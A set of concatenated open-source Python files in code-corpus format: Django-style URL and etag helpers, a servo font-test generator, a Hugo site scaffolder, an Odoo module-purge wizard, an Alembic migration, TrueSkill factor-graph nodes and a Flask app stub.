    Raises ValueError for negative input (and, on Python 2, for values
    larger than sys.maxint); raises TypeError on Python 2 for non-integers.
    """
    char_set = '0123456789abcdefghijklmnopqrstuvwxyz'
    if i < 0:
        raise ValueError("Negative base36 conversion input.")
    # Python 3 ints are unbounded and the comparison above already rejects
    # non-numeric input, so these extra checks only apply on Python 2.
    if six.PY2:
        if not isinstance(i, six.integer_types):
            raise TypeError("Non-integer base36 conversion input.")
        if i > sys.maxint:
            raise ValueError("Base36 conversion input too large.")
    # Single-digit fast path.
    if i < 36:
        return char_set[i]
    # Repeatedly divide by 36, prepending each remainder digit.
    b36 = ''
    while i != 0:
        i, n = divmod(i, 36)
        b36 = char_set[n] + b36
    return b36
def urlsafe_base64_encode(s):
    """
    Encode the bytestring ``s`` with URL-safe base64, stripping the trailing
    '=' padding (and any newline) so the result can be embedded in a URL.
    """
    encoded = base64.urlsafe_b64encode(s)
    return encoded.rstrip(b'\n=')
def urlsafe_base64_decode(s):
    """
    Decodes a base64 encoded string, adding back any trailing equal signs that
    might have been stripped.
    """
    s = force_bytes(s)
    try:
        # Re-append '=' padding before decoding; binascii's decoder appears
        # to tolerate surplus padding characters, so over-padding is
        # harmless here -- NOTE(review): confirm against the target Python.
        return base64.urlsafe_b64decode(s.ljust(len(s) + len(s) % 4, b'='))
    except (LookupError, BinasciiError) as e:
        # Normalise decoder failures into ValueError for callers.
        raise ValueError(e)
def parse_etags(etag_str):
    """
    Parses a string with one or several etags passed in If-None-Match and
    If-Match headers by the rules in RFC 2616. Returns a list of etags
    without surrounding double quotes (") and unescaped from \<CHAR>.
    """
    etags = ETAG_MATCH.findall(etag_str)
    if not etags:
        # etag_str has wrong format, treat it as an opaque string then
        return [etag_str]
    # Undo backslash escaping inside each quoted etag value.
    etags = [e.encode('ascii').decode('unicode_escape') for e in etags]
    return etags
def quote_etag(etag):
    """
    Wrap ``etag`` in double quotes, backslash-escaping any backslash or
    double-quote characters it contains.
    """
    escaped = etag.replace('\\', '\\\\').replace('"', '\\"')
    return '"{0}"'.format(escaped)
def is_same_domain(host, pattern):
    """
    Return ``True`` if ``host`` matches ``pattern`` exactly, or matches it as
    a wildcard.

    A pattern starting with a period matches the bare domain and every
    subdomain (``.example.com`` matches both ``example.com`` and
    ``foo.example.com``); any other pattern must match exactly.
    An empty pattern never matches.
    """
    if not pattern:
        return False
    normalized = pattern.lower()
    if normalized == host:
        return True
    return normalized.startswith('.') and (
        host.endswith(normalized) or host == normalized[1:]
    )
def is_safe_url(url, host=None):
    """
    Return ``True`` if ``url`` is a safe redirection target: it stays on
    ``host`` (or is host-relative) and uses only the http/https schemes.

    An empty, ``None``, or all-whitespace url always yields ``False``.
    """
    if url is not None:
        url = url.strip()
    if not url:
        return False
    # Chrome treats \ completely as /
    url = url.replace('\\', '/')
    # Chrome considers any URL with more than two slashes to be absolute, but
    # urlparse is not so flexible. Treat any url with three slashes as unsafe.
    if url.startswith('///'):
        return False
    parsed = urlparse(url)
    # Forbid URLs like http:///example.com - with a scheme, but without a
    # hostname: Chrome would still treat example.com as the hostname there.
    if parsed.scheme and not parsed.netloc:
        return False
    # Forbid URLs that start with control characters. Some browsers (like
    # Chrome) ignore quite a few control characters at the start of a
    # URL and might consider the URL as scheme relative.
    if unicodedata.category(url[0])[0] == 'C':
        return False
    host_ok = not parsed.netloc or parsed.netloc == host
    scheme_ok = not parsed.scheme or parsed.scheme in ('http', 'https')
    return host_ok and scheme_ok
| bsd-3-clause |
alon/servo | tests/wpt/css-tests/css-fonts-3_dev/xhtml1/reference/support/fonts/makegsubfonts.py | 1616 | 14125 |
import os
import textwrap
from xml.etree import ElementTree
from fontTools.ttLib import TTFont, newTable
from fontTools.misc.psCharStrings import T2CharString
from fontTools.ttLib.tables.otTables import GSUB,\
ScriptList, ScriptRecord, Script, DefaultLangSys,\
FeatureList, FeatureRecord, Feature,\
LookupList, Lookup, AlternateSubst, SingleSubst
# paths
directory = os.path.dirname(__file__)
shellSourcePath = os.path.join(directory, "gsubtest-shell.ttx")
shellTempPath = os.path.join(directory, "gsubtest-shell.otf")
featureList = os.path.join(directory, "gsubtest-features.txt")
javascriptData = os.path.join(directory, "gsubtest-features.js")
outputPath = os.path.join(os.path.dirname(directory), "gsubtest-lookup%d")
baseCodepoint = 0xe000
# -------
# Features
# -------
# Read the tab-separated feature list at import time; the first column of
# each line is an OpenType feature tag. Blank lines and '#' comments are
# skipped. NOTE(review): the file is opened in binary mode but treated as
# text -- this assumes Python 2 str semantics.
f = open(featureList, "rb")
text = f.read()
f.close()
mapping = []
for line in text.splitlines():
    line = line.strip()
    if not line:
        continue
    if line.startswith("#"):
        continue
    # parse
    values = line.split("\t")
    tag = values.pop(0)
    mapping.append(tag);
# --------
# Outlines
# --------
def addGlyphToCFF(glyphName=None, program=None, private=None, globalSubrs=None, charStringsIndex=None, topDict=None, charStrings=None):
    """Append one glyph (a Type 2 charstring built from ``program``) to the
    font's CFF table, registering it in the charstring index, the
    CharStrings mapping and the charset."""
    charString = T2CharString(program=program, private=private, globalSubrs=globalSubrs)
    charStringsIndex.append(charString)
    # The new glyph's ID is the next slot in the charset.
    glyphID = len(topDict.charset)
    charStrings.charStrings[glyphName] = glyphID
    topDict.charset.append(glyphName)
def makeLookup1():
    """Build the gsubtest-lookup1 OTF: for every feature tag, a .pass/.fail
    glyph pair plus a GSUB type 1 (single substitution) lookup that swaps
    them when the feature is enabled.

    Fixes relative to the original: ``raise X, msg`` (Python 2-only syntax)
    is replaced by the call form, and FeatureIndex is materialised with
    ``list(range(...))`` -- both behave identically on Python 2 and also
    work on Python 3.
    """
    # make a variation of the shell TTX data
    f = open(shellSourcePath)
    ttxData = f.read()
    f.close()
    ttxData = ttxData.replace("__familyName__", "gsubtest-lookup1")
    tempShellSourcePath = shellSourcePath + ".temp"
    f = open(tempShellSourcePath, "wb")
    f.write(ttxData)
    f.close()
    # compile the shell
    shell = TTFont(sfntVersion="OTTO")
    shell.importXML(tempShellSourcePath)
    shell.save(shellTempPath)
    os.remove(tempShellSourcePath)
    # load the shell
    shell = TTFont(shellTempPath)
    # grab the PASS and FAIL data
    hmtx = shell["hmtx"]
    glyphSet = shell.getGlyphSet()
    failGlyph = glyphSet["F"]
    failGlyph.decompile()
    failGlyphProgram = list(failGlyph.program)
    failGlyphMetrics = hmtx["F"]
    passGlyph = glyphSet["P"]
    passGlyph.decompile()
    passGlyphProgram = list(passGlyph.program)
    passGlyphMetrics = hmtx["P"]
    # grab some tables
    hmtx = shell["hmtx"]
    cmap = shell["cmap"]
    # start the glyph order
    existingGlyphs = [".notdef", "space", "F", "P"]
    glyphOrder = list(existingGlyphs)
    # start the CFF
    cff = shell["CFF "].cff
    globalSubrs = cff.GlobalSubrs
    topDict = cff.topDictIndex[0]
    topDict.charset = existingGlyphs
    private = topDict.Private
    charStrings = topDict.CharStrings
    charStringsIndex = charStrings.charStringsIndex
    features = sorted(mapping)
    # build the outline, hmtx and cmap data
    cp = baseCodepoint
    for index, tag in enumerate(features):
        # tag.pass
        glyphName = "%s.pass" % tag
        glyphOrder.append(glyphName)
        addGlyphToCFF(
            glyphName=glyphName,
            program=passGlyphProgram,
            private=private,
            globalSubrs=globalSubrs,
            charStringsIndex=charStringsIndex,
            topDict=topDict,
            charStrings=charStrings
        )
        hmtx[glyphName] = passGlyphMetrics
        for table in cmap.tables:
            if table.format == 4:
                table.cmap[cp] = glyphName
            else:
                raise NotImplementedError("Unsupported cmap table format: %d" % table.format)
        cp += 1
        # tag.fail
        glyphName = "%s.fail" % tag
        glyphOrder.append(glyphName)
        addGlyphToCFF(
            glyphName=glyphName,
            program=failGlyphProgram,
            private=private,
            globalSubrs=globalSubrs,
            charStringsIndex=charStringsIndex,
            topDict=topDict,
            charStrings=charStrings
        )
        hmtx[glyphName] = failGlyphMetrics
        for table in cmap.tables:
            if table.format == 4:
                table.cmap[cp] = glyphName
            else:
                raise NotImplementedError("Unsupported cmap table format: %d" % table.format)
        # bump this up so that the sequence is the same as the lookup 3 font
        cp += 3
    # set the glyph order
    shell.setGlyphOrder(glyphOrder)
    # start the GSUB
    shell["GSUB"] = newTable("GSUB")
    gsub = shell["GSUB"].table = GSUB()
    gsub.Version = 1.0
    # make a list of all the features we will make
    featureCount = len(features)
    # set up the script list
    scriptList = gsub.ScriptList = ScriptList()
    scriptList.ScriptCount = 1
    scriptList.ScriptRecord = []
    scriptRecord = ScriptRecord()
    scriptList.ScriptRecord.append(scriptRecord)
    scriptRecord.ScriptTag = "DFLT"
    script = scriptRecord.Script = Script()
    defaultLangSys = script.DefaultLangSys = DefaultLangSys()
    defaultLangSys.FeatureCount = featureCount
    defaultLangSys.FeatureIndex = list(range(defaultLangSys.FeatureCount))
    defaultLangSys.ReqFeatureIndex = 65535
    defaultLangSys.LookupOrder = None
    script.LangSysCount = 0
    script.LangSysRecord = []
    # set up the feature list
    featureList = gsub.FeatureList = FeatureList()
    featureList.FeatureCount = featureCount
    featureList.FeatureRecord = []
    for index, tag in enumerate(features):
        # feature record
        featureRecord = FeatureRecord()
        featureRecord.FeatureTag = tag
        feature = featureRecord.Feature = Feature()
        featureList.FeatureRecord.append(featureRecord)
        # feature
        feature.FeatureParams = None
        feature.LookupCount = 1
        feature.LookupListIndex = [index]
    # write the lookups
    lookupList = gsub.LookupList = LookupList()
    lookupList.LookupCount = featureCount
    lookupList.Lookup = []
    for tag in features:
        # lookup
        lookup = Lookup()
        lookup.LookupType = 1
        lookup.LookupFlag = 0
        lookup.SubTableCount = 1
        lookup.SubTable = []
        lookupList.Lookup.append(lookup)
        # subtable: swap pass <-> fail when the feature fires
        subtable = SingleSubst()
        subtable.Format = 2
        subtable.LookupType = 1
        subtable.mapping = {
            "%s.pass" % tag : "%s.fail" % tag,
            "%s.fail" % tag : "%s.pass" % tag,
        }
        lookup.SubTable.append(subtable)
    path = outputPath % 1 + ".otf"
    if os.path.exists(path):
        os.remove(path)
    shell.save(path)
    # get rid of the shell
    if os.path.exists(shellTempPath):
        os.remove(shellTempPath)
def makeLookup3():
    """Build the gsubtest-lookup3 OTF: for every feature tag, a .default
    glyph plus three alternates wired through a GSUB type 3 (alternate
    substitution) lookup, so each alternate index selects PASS exactly once.

    Fixes relative to the original: ``raise X, msg`` (Python 2-only syntax)
    is replaced by the call form, and FeatureIndex is materialised with
    ``list(range(...))`` -- both behave identically on Python 2 and also
    work on Python 3.
    """
    # make a variation of the shell TTX data
    f = open(shellSourcePath)
    ttxData = f.read()
    f.close()
    ttxData = ttxData.replace("__familyName__", "gsubtest-lookup3")
    tempShellSourcePath = shellSourcePath + ".temp"
    f = open(tempShellSourcePath, "wb")
    f.write(ttxData)
    f.close()
    # compile the shell
    shell = TTFont(sfntVersion="OTTO")
    shell.importXML(tempShellSourcePath)
    shell.save(shellTempPath)
    os.remove(tempShellSourcePath)
    # load the shell
    shell = TTFont(shellTempPath)
    # grab the PASS and FAIL data
    hmtx = shell["hmtx"]
    glyphSet = shell.getGlyphSet()
    failGlyph = glyphSet["F"]
    failGlyph.decompile()
    failGlyphProgram = list(failGlyph.program)
    failGlyphMetrics = hmtx["F"]
    passGlyph = glyphSet["P"]
    passGlyph.decompile()
    passGlyphProgram = list(passGlyph.program)
    passGlyphMetrics = hmtx["P"]
    # grab some tables
    hmtx = shell["hmtx"]
    cmap = shell["cmap"]
    # start the glyph order
    existingGlyphs = [".notdef", "space", "F", "P"]
    glyphOrder = list(existingGlyphs)
    # start the CFF
    cff = shell["CFF "].cff
    globalSubrs = cff.GlobalSubrs
    topDict = cff.topDictIndex[0]
    topDict.charset = existingGlyphs
    private = topDict.Private
    charStrings = topDict.CharStrings
    charStringsIndex = charStrings.charStringsIndex
    features = sorted(mapping)
    # build the outline, hmtx and cmap data
    cp = baseCodepoint
    for index, tag in enumerate(features):
        # tag.pass
        glyphName = "%s.pass" % tag
        glyphOrder.append(glyphName)
        addGlyphToCFF(
            glyphName=glyphName,
            program=passGlyphProgram,
            private=private,
            globalSubrs=globalSubrs,
            charStringsIndex=charStringsIndex,
            topDict=topDict,
            charStrings=charStrings
        )
        hmtx[glyphName] = passGlyphMetrics
        # tag.fail
        glyphName = "%s.fail" % tag
        glyphOrder.append(glyphName)
        addGlyphToCFF(
            glyphName=glyphName,
            program=failGlyphProgram,
            private=private,
            globalSubrs=globalSubrs,
            charStringsIndex=charStringsIndex,
            topDict=topDict,
            charStrings=charStrings
        )
        hmtx[glyphName] = failGlyphMetrics
        # tag.default
        glyphName = "%s.default" % tag
        glyphOrder.append(glyphName)
        addGlyphToCFF(
            glyphName=glyphName,
            program=passGlyphProgram,
            private=private,
            globalSubrs=globalSubrs,
            charStringsIndex=charStringsIndex,
            topDict=topDict,
            charStrings=charStrings
        )
        hmtx[glyphName] = passGlyphMetrics
        for table in cmap.tables:
            if table.format == 4:
                table.cmap[cp] = glyphName
            else:
                raise NotImplementedError("Unsupported cmap table format: %d" % table.format)
        cp += 1
        # tag.alt1,2,3
        for i in range(1,4):
            glyphName = "%s.alt%d" % (tag, i)
            glyphOrder.append(glyphName)
            addGlyphToCFF(
                glyphName=glyphName,
                program=failGlyphProgram,
                private=private,
                globalSubrs=globalSubrs,
                charStringsIndex=charStringsIndex,
                topDict=topDict,
                charStrings=charStrings
            )
            hmtx[glyphName] = failGlyphMetrics
            for table in cmap.tables:
                if table.format == 4:
                    table.cmap[cp] = glyphName
                else:
                    raise NotImplementedError("Unsupported cmap table format: %d" % table.format)
            cp += 1
    # set the glyph order
    shell.setGlyphOrder(glyphOrder)
    # start the GSUB
    shell["GSUB"] = newTable("GSUB")
    gsub = shell["GSUB"].table = GSUB()
    gsub.Version = 1.0
    # make a list of all the features we will make
    featureCount = len(features)
    # set up the script list
    scriptList = gsub.ScriptList = ScriptList()
    scriptList.ScriptCount = 1
    scriptList.ScriptRecord = []
    scriptRecord = ScriptRecord()
    scriptList.ScriptRecord.append(scriptRecord)
    scriptRecord.ScriptTag = "DFLT"
    script = scriptRecord.Script = Script()
    defaultLangSys = script.DefaultLangSys = DefaultLangSys()
    defaultLangSys.FeatureCount = featureCount
    defaultLangSys.FeatureIndex = list(range(defaultLangSys.FeatureCount))
    defaultLangSys.ReqFeatureIndex = 65535
    defaultLangSys.LookupOrder = None
    script.LangSysCount = 0
    script.LangSysRecord = []
    # set up the feature list
    featureList = gsub.FeatureList = FeatureList()
    featureList.FeatureCount = featureCount
    featureList.FeatureRecord = []
    for index, tag in enumerate(features):
        # feature record
        featureRecord = FeatureRecord()
        featureRecord.FeatureTag = tag
        feature = featureRecord.Feature = Feature()
        featureList.FeatureRecord.append(featureRecord)
        # feature
        feature.FeatureParams = None
        feature.LookupCount = 1
        feature.LookupListIndex = [index]
    # write the lookups
    lookupList = gsub.LookupList = LookupList()
    lookupList.LookupCount = featureCount
    lookupList.Lookup = []
    for tag in features:
        # lookup
        lookup = Lookup()
        lookup.LookupType = 3
        lookup.LookupFlag = 0
        lookup.SubTableCount = 1
        lookup.SubTable = []
        lookupList.Lookup.append(lookup)
        # subtable: each alternate index maps exactly one glyph to PASS
        subtable = AlternateSubst()
        subtable.Format = 1
        subtable.LookupType = 3
        subtable.alternates = {
            "%s.default" % tag : ["%s.fail" % tag, "%s.fail" % tag, "%s.fail" % tag],
            "%s.alt1" % tag : ["%s.pass" % tag, "%s.fail" % tag, "%s.fail" % tag],
            "%s.alt2" % tag : ["%s.fail" % tag, "%s.pass" % tag, "%s.fail" % tag],
            "%s.alt3" % tag : ["%s.fail" % tag, "%s.fail" % tag, "%s.pass" % tag]
        }
        lookup.SubTable.append(subtable)
    path = outputPath % 3 + ".otf"
    if os.path.exists(path):
        os.remove(path)
    shell.save(path)
    # get rid of the shell
    if os.path.exists(shellTempPath):
        os.remove(shellTempPath)
def makeJavascriptData():
    """Write gsubtest-features.js: a gFeatures object mapping every feature
    tag to its base codepoint (each tag reserves a block of 4 codepoints,
    matching the glyph layout produced by makeLookup3)."""
    features = sorted(mapping)
    outStr = []
    outStr.append("")
    outStr.append("/* This file is autogenerated by makegsubfonts.py */")
    outStr.append("")
    outStr.append("/* ")
    outStr.append(" Features defined in gsubtest fonts with associated base")
    outStr.append(" codepoints for each feature:")
    outStr.append("")
    outStr.append(" cp = codepoint for feature featX")
    outStr.append("")
    outStr.append(" cp default PASS")
    outStr.append(" cp featX=1 FAIL")
    outStr.append(" cp featX=2 FAIL")
    outStr.append("")
    outStr.append(" cp+1 default FAIL")
    outStr.append(" cp+1 featX=1 PASS")
    outStr.append(" cp+1 featX=2 FAIL")
    outStr.append("")
    outStr.append(" cp+2 default FAIL")
    outStr.append(" cp+2 featX=1 FAIL")
    outStr.append(" cp+2 featX=2 PASS")
    outStr.append("")
    outStr.append("*/")
    outStr.append("")
    outStr.append("var gFeatures = {");
    cp = baseCodepoint
    taglist = []
    for tag in features:
        taglist.append("\"%s\": 0x%x" % (tag, cp))
        # Each feature occupies 4 consecutive codepoints.
        cp += 4
    outStr.append(textwrap.fill(", ".join(taglist), initial_indent=" ", subsequent_indent=" "))
    outStr.append("};");
    outStr.append("");
    if os.path.exists(javascriptData):
        os.remove(javascriptData)
    # NOTE(review): writing str to a "wb" handle assumes Python 2.
    f = open(javascriptData, "wb")
    f.write("\n".join(outStr))
    f.close()
# build fonts
# Parenthesized print works identically on Python 2 (prints the string
# expression) and Python 3 (function call); the bare statement form was
# a SyntaxError on Python 3.
print("Making lookup type 1 font...")
makeLookup1()
print("Making lookup type 3 font...")
makeLookup3()
# output javascript data
print("Making javascript data file...")
makeJavascriptData()
| mpl-2.0 |
discogs/python-livingdocs | src/livingdocs/static_site.py | 1 | 1371 | import shutil
import os
class StaticSite(object):
    """Scaffolds a minimal Hugo static-site build for living documentation."""

    def __init__(self, title='', description='', baseurl=''):
        self.title = title
        self.description = description
        self.baseurl = baseurl

    def create(self, path="livingdocs"):
        """
        Scaffolds a simple Hugo static site build under ``path``.

        Fix: the original ignored ``path`` when copying the template
        directories and when writing the config, always writing into a
        hard-coded 'livingdocs' directory. The default keeps the old
        behaviour.
        """
        os.makedirs(path)
        dirs = ['layouts', 'static']
        for d in dirs:
            template = u'site_files/%s' % d
            directory = os.path.join(os.path.dirname(__file__), template)
            self.copy(directory, os.path.join(path, d))
            print(u'added %s' % d)
        self.make_config(path)

    def make_config(self, path="livingdocs"):
        """
        Creates config.toml inside ``path`` (defaults to 'livingdocs' for
        backward compatibility). Appends if the file already exists.
        """
        with open(os.path.join(path, u"config.toml"), "a") as cfg:
            cfg.write(u"baseurl = '%s'\n" % self.baseurl)
            cfg.write(u"title = '%s'\n" % self.title)
            cfg.write(u"description = '%s'\n" % self.description)
            cfg.write(u"languageCode = 'en-us'\n")
            cfg.write(u"SectionPagesMenu = 'main'\n")
            cfg.write(u"\n")
            cfg.write(u"[taxonomies]\n")
            cfg.write(u"tag = \"tags\"\n")

    def copy(self, src, dest):
        """
        Copies both directories and files to a
        given destination.
        """
        shutil.copytree(src, dest)
| bsd-2-clause |
Vauxoo/server-tools | database_cleanup/models/purge_modules.py | 2 | 3569 | # Copyright 2014-2016 Therp BV <http://therp.nl>
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
# pylint: disable=consider-merging-classes-inherited
from odoo import _, api, fields, models
from odoo.exceptions import UserError
from odoo.modules.module import get_module_path
from odoo.addons.base.models.ir_model import MODULE_UNINSTALL_FLAG
class IrModelData(models.Model):
    _inherit = 'ir.model.data'

    @api.model
    def _module_data_uninstall(self, modules_to_remove):
        """this function crashes for xmlids on undefined models or fields
        referring to undefined models"""
        # Drop xmlids that point at models/fields no longer present in the
        # registry before delegating, so the core uninstall cannot crash.
        for this in self.search([('module', 'in', modules_to_remove)]):
            if this.model == 'ir.model.fields':
                # MODULE_UNINSTALL_FLAG lets us browse records that are
                # already scheduled for removal.
                field = self.env[this.model].with_context(
                    **{MODULE_UNINSTALL_FLAG: True}).browse(this.res_id)
                if not field.exists() or field.model not in self.env:
                    this.unlink()
                    continue
            if this.model not in self.env:
                this.unlink()
        return super(IrModelData, self)._module_data_uninstall(
            modules_to_remove)
class CleanupPurgeLineModule(models.TransientModel):
    _inherit = 'cleanup.purge.line'
    _name = 'cleanup.purge.line.module'

    wizard_id = fields.Many2one(
        'cleanup.purge.wizard.module', 'Purge Wizard', readonly=True)

    @api.multi
    def purge(self):
        """
        Uninstall modules upon manual confirmation, then reload
        the database.
        """
        module_names = self.filtered(lambda x: not x.purged).mapped('name')
        modules = self.env['ir.module.module'].search([
            ('name', 'in', module_names)
        ])
        if not modules:
            return True
        self.logger.info('Purging modules %s', ', '.join(module_names))
        # Never-installed modules can be marked uninstalled directly.
        modules.filtered(
            lambda x: x.state == 'to install'
        ).write({'state': 'uninstalled'})
        # Normalise pending upgrade/removal states back to 'installed' so
        # the uninstall below starts from a consistent state.
        modules.filtered(
            lambda x: x.state in ('to upgrade', 'to remove')
        ).write({'state': 'installed'})
        # 'base' must never be uninstalled.
        modules.filtered(
            lambda x: x.state == 'installed' and x.name != 'base'
        ).button_immediate_uninstall()
        modules.refresh()
        # Remove leftover module records in any other state.
        modules.filtered(
            lambda x: x.state not in (
                'installed', 'to upgrade', 'to remove', 'to install')
        ).unlink()
        return self.write({'purged': True})
class CleanupPurgeWizardModule(models.TransientModel):
    _inherit = 'cleanup.purge.wizard'
    _name = 'cleanup.purge.wizard.module'
    _description = 'Purge modules'

    @api.model
    def find(self):
        """Collect modules whose source is gone from disk; uninstalled ones
        are purged immediately, the rest are proposed as wizard lines."""
        res = []
        purge_lines = self.env['cleanup.purge.line.module']
        IrModule = self.env['ir.module.module']
        for module in IrModule.search(
                [
                    ('to_buy', '=', False),
                    ('name', '!=', 'studio_customization')
                ]
        ):
            # Still present on disk: nothing to clean up.
            if get_module_path(module.name, display_warning=False):
                continue
            if module.state == 'uninstalled':
                purge_lines += self.env['cleanup.purge.line.module'].create({
                    'name': module.name,
                })
                continue
            res.append((0, 0, {'name': module.name}))
        purge_lines.purge()
        if not res:
            raise UserError(_('No modules found to purge'))
        return res

    purge_line_ids = fields.One2many(
        'cleanup.purge.line.module', 'wizard_id', 'Modules to purge')
| agpl-3.0 |
Smashman/mods.tf | alembic/versions/4db12e0c5745_initial_pass.py | 1 | 1247 | """Initial pass
Revision ID: 4db12e0c5745
Revises: None
Create Date: 2014-07-05 15:30:34.596840
"""
# revision identifiers, used by Alembic.
revision = '4db12e0c5745'
down_revision = None
from alembic import op
import sqlalchemy as sa
def upgrade():
    """Create the initial ``users`` table (Steam account data)."""
    ### commands auto generated by Alembic - please adjust! ###
    op.create_table('users',
    # Steam account id is the natural primary key; no autoincrement.
    sa.Column('account_id', sa.Integer(), autoincrement=False, nullable=False),
    sa.Column('name', sa.String(length=256, collation='utf8_swedish_ci'), nullable=True),
    sa.Column('profile_url', sa.String(length=128), nullable=True),
    sa.Column('avatar_small', sa.String(length=128), nullable=True),
    sa.Column('avatar_medium', sa.String(length=128), nullable=True),
    sa.Column('avatar_large', sa.String(length=128), nullable=True),
    sa.Column('joined', sa.DateTime(), nullable=False),
    sa.Column('last_seen', sa.DateTime(), nullable=False),
    sa.Column('user_class', sa.Integer(), nullable=True),
    sa.Column('enabled', sa.Boolean(), nullable=True),
    sa.PrimaryKeyConstraint('account_id')
    )
    ### end Alembic commands ###
def downgrade():
    """Revert the initial migration by dropping the ``users`` table."""
    ### commands auto generated by Alembic - please adjust! ###
    op.drop_table('users')
    ### end Alembic commands ###
| gpl-3.0 |
Manwe56/trueskill-ai-contest-test-tool | trueskill/trueskill/factorgraph.py | 1 | 5876 | # -*- coding: utf-8 -*-
"""
trueskill.factorgraph
~~~~~~~~~~~~~~~~~~~~~
This module contains nodes for the factor graph of TrueSkill algorithm.
:copyright: (c) 2012-2013 by Heungsub Lee.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
import itertools
import math
from .mathematics import Gaussian, inf
__all__ = ['Variable', 'PriorFactor', 'LikelihoodFactor', 'SumFactor',
'TruncateFactor']
class Node(object):
    """Marker base class for nodes of the TrueSkill factor graph."""
    pass
class Variable(Node, Gaussian):
    """A variable node: holds the current Gaussian belief (inherited state)
    plus, per connected factor, the last message that factor sent."""
    def __init__(self):
        # factor -> last Gaussian message received from that factor.
        self.messages = {}
        super(Variable, self).__init__()
    def set(self, val):
        """Overwrite the belief with ``val``; return how far it moved."""
        delta = self.delta(val)
        self.pi, self.tau = val.pi, val.tau
        return delta
    def delta(self, other):
        """Convergence metric between this belief and ``other``."""
        pi_delta = abs(self.pi - other.pi)
        if pi_delta == inf:
            # Precision jumped to infinity; report no change to avoid NaNs.
            return 0.
        return max(abs(self.tau - other.tau), math.sqrt(pi_delta))
    def update_message(self, factor, pi=0, tau=0, message=None):
        """Replace ``factor``'s message and fold the change into the belief."""
        message = message or Gaussian(pi=pi, tau=tau)
        old_message, self[factor] = self[factor], message
        # Divide out the old message, multiply in the new one.
        return self.set(self / old_message * message)
    def update_value(self, factor, pi=0, tau=0, value=None):
        """Force the belief to ``value``, back-solving ``factor``'s message."""
        value = value or Gaussian(pi=pi, tau=tau)
        old_message = self[factor]
        self[factor] = value * old_message / self
        return self.set(value)
    def __getitem__(self, factor):
        return self.messages[factor]
    def __setitem__(self, factor, message):
        self.messages[factor] = message
    def __repr__(self):
        args = (type(self).__name__, super(Variable, self).__repr__(),
                len(self.messages), '' if len(self.messages) == 1 else 's')
        return '<%s %s with %d connection%s>' % args
class Factor(Node):
    """Base class for factor nodes; connects to one or more Variables."""
    def __init__(self, vars):
        self.vars = vars
        # Initialise every edge with a non-informative (flat) message.
        for var in vars:
            var[self] = Gaussian()
    def down(self):
        # Default no-op downward pass; subclasses return the belief delta.
        return 0
    def up(self):
        # Default no-op upward pass.
        return 0
    @property
    def var(self):
        # Convenience accessor for factors connected to a single variable.
        assert len(self.vars) == 1
        return self.vars[0]
    def __repr__(self):
        args = (type(self).__name__, len(self.vars),
                '' if len(self.vars) == 1 else 's')
        return '<%s with %d connection%s>' % args
class PriorFactor(Factor):
    """Anchors a variable to a prior Gaussian ``val``; ``dynamic`` widens the
    prior's standard deviation (added in quadrature)."""
    def __init__(self, var, val, dynamic=0):
        super(PriorFactor, self).__init__([var])
        self.val = val
        self.dynamic = dynamic
    def down(self):
        # Inflate sigma by the dynamic term, then push the prior down.
        sigma = math.sqrt(self.val.sigma ** 2 + self.dynamic ** 2)
        value = Gaussian(self.val.mu, sigma)
        return self.var.update_value(self, value=value)
class LikelihoodFactor(Factor):
    """Links a mean variable to a value variable through additive Gaussian
    noise with the given ``variance``."""
    def __init__(self, mean_var, value_var, variance):
        super(LikelihoodFactor, self).__init__([mean_var, value_var])
        self.mean = mean_var
        self.value = value_var
        self.variance = variance
    def down(self):
        # update value
        val = self.mean
        msg = val / self.mean[self]
        pi = 1. / self.variance
        # a damps the message by the noise precision.
        a = pi / (pi + val.pi)
        return self.value.update_message(self, a * msg.pi, a * msg.tau)
    def up(self):
        # update mean
        val = self.value
        msg = val / self.value[self]
        a = 1. / (1 + self.variance * msg.pi)
        return self.mean.update_message(self, a * msg.pi, a * msg.tau)
class SumFactor(Factor):
    """Constrains ``sum_var`` to the weighted sum of ``term_vars``, with
    ``coeffs[i]`` weighting ``term_vars[i]``.

    Fix: uses the builtin ``zip`` instead of ``itertools.izip`` --
    identical iteration behaviour on Python 2, and ``izip`` does not
    exist on Python 3.
    """
    def __init__(self, sum_var, term_vars, coeffs):
        super(SumFactor, self).__init__([sum_var] + term_vars)
        self.sum = sum_var
        self.terms = term_vars
        self.coeffs = coeffs
    def down(self):
        vals = self.terms
        msgs = [var[self] for var in vals]
        return self.update(self.sum, vals, msgs, self.coeffs)
    def up(self, index=0):
        # Solve the sum constraint for term ``index`` by inverting the
        # coefficient vector (zero coefficients map to zero weight).
        coeff = self.coeffs[index]
        coeffs = []
        for x, c in enumerate(self.coeffs):
            try:
                if x == index:
                    coeffs.append(1. / coeff)
                else:
                    coeffs.append(-c / coeff)
            except ZeroDivisionError:
                coeffs.append(0.)
        vals = self.terms[:]
        vals[index] = self.sum
        msgs = [var[self] for var in vals]
        return self.update(self.terms[index], vals, msgs, coeffs)
    def update(self, var, vals, msgs, coeffs):
        """Send the weighted-sum message to ``var``; returns the delta."""
        pi_inv = 0
        mu = 0
        for val, msg, coeff in zip(vals, msgs, coeffs):
            div = val / msg
            mu += coeff * div.mu
            if pi_inv == inf:
                continue
            try:
                # numpy.float64 handles floating-point error by different way.
                # For example, it can just warn RuntimeWarning on n/0 problem
                # instead of throwing ZeroDivisionError. So div.pi, the
                # denominator has to be a built-in float.
                pi_inv += coeff ** 2 / float(div.pi)
            except ZeroDivisionError:
                pi_inv = inf
        pi = 1. / pi_inv
        tau = pi * mu
        return var.update_message(self, pi, tau)
class TruncateFactor(Factor):
    """Truncation factor modelling a game outcome: ``v_func``/``w_func`` are
    the win- or draw-specific correction functions applied inside the
    ``draw_margin``."""
    def __init__(self, var, v_func, w_func, draw_margin):
        super(TruncateFactor, self).__init__([var])
        self.v_func = v_func
        self.w_func = w_func
        self.draw_margin = draw_margin
    def up(self):
        val = self.var
        msg = self.var[self]
        div = val / msg
        sqrt_pi = math.sqrt(div.pi)
        # Standardised arguments for the correction functions.
        args = (div.tau / sqrt_pi, self.draw_margin * sqrt_pi)
        v = self.v_func(*args)
        w = self.w_func(*args)
        denom = (1. - w)
        pi, tau = div.pi / denom, (div.tau + sqrt_pi * v) / denom
        return val.update_value(self, pi, tau)
| gpl-2.0 |
AntoineLee/spider163 | spider163/www/web.py | 1 | 1330 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from flask import Flask, request, json, jsonify
from flask import render_template,make_response
from spider163.spider import playlist
from spider163.utils import pysql
import json
# Flask application serving the spider163 dashboard.
